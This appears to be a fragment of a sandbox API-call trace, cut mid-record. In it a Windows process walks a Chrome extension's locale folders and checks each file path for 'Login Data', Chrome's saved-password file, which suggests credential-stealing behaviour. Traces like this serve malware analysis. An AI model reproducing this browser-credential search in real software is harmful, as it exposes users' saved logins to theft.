returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.745] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.745] lstrlenW (lpString="ms") returned 2 [0161.745] GetProcessHeap () returned 0x8e0000 [0161.745] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.745] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.745] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms" [0161.745] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.745] GetProcessHeap () returned 0x8e0000 [0161.745] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.745] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned 137 [0161.745] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned 137 [0161.745] lstrlenW (lpString="\\*.*") returned 4 [0161.745] GetProcessHeap () returned 0x8e0000 [0161.745] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.745] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms" [0161.745] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*.*" [0161.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865d1c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865d1c50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.745] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.745] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865d1c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865d1c50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.745] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.745] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.745] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865d1480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.745] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned 137 [0161.745] lstrlenW (lpString="\\") returned 1 [0161.745] GetProcessHeap () returned 0x8e0000 [0161.745] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.746] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms" [0161.746] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\" [0161.746] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\") returned 138 [0161.746] lstrlenW (lpString="messages.json") returned 13 [0161.746] GetProcessHeap () returned 0x8e0000 [0161.746] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.746] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\" [0161.746] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" [0161.746] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.746] GetProcessHeap () returned 0x8e0000 [0161.746] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.746] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json", lpSrch="Login Data") returned 0x0 [0161.746] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.746] GetProcessHeap () returned 0x8e0000 [0161.746] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.746] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865d1480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.746] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.746] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.746] GetProcessHeap () returned 0x8e0000 [0161.746] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.746] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.746] GetProcessHeap () returned 0x8e0000 [0161.746] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.746] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865f7db0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865f7db0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="nl", cAlternateFileName="")) returned 1 [0161.746] lstrcmpiW (lpString1="nl", lpString2=".") returned 1 [0161.746] lstrcmpiW (lpString1="nl", lpString2="..") returned 1 [0161.746] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.746] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.746] lstrlenW (lpString="\\") returned 1 [0161.746] GetProcessHeap () returned 0x8e0000 [0161.746] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.746] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.746] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.747] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.747] lstrlenW (lpString="nl") returned 2 [0161.747] GetProcessHeap () returned 0x8e0000 [0161.747] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.747] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.747] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl" [0161.747] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.747] GetProcessHeap () returned 0x8e0000 [0161.747] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.747] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned 137 [0161.747] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned 137 [0161.747] lstrlenW (lpString="\\*.*") returned 4 [0161.747] GetProcessHeap () returned 0x8e0000 [0161.747] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.747] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl" [0161.747] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*.*" [0161.747] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865f7db0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865f7db0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.748] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.748] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865f7db0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865f7db0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.748] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.748] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.748] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865f7db0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865f8580, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.748] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned 137 [0161.748] lstrlenW (lpString="\\") returned 1 [0161.748] GetProcessHeap () returned 0x8e0000 [0161.748] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.748] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl" [0161.748] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\" [0161.748] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\") returned 138 [0161.748] lstrlenW (lpString="messages.json") returned 13 [0161.748] GetProcessHeap () returned 0x8e0000 [0161.748] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.748] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\" [0161.748] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" [0161.748] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.748] GetProcessHeap () returned 0x8e0000 [0161.748] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.748] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.748] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.748] GetProcessHeap () returned 0x8e0000 [0161.748] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.748] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865f7db0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865f8580, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.749] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.749] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.749] GetProcessHeap () returned 0x8e0000 [0161.749] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.749] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.749] GetProcessHeap () returned 0x8e0000 [0161.749] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.749] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865f7db0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661df10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8661df10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, 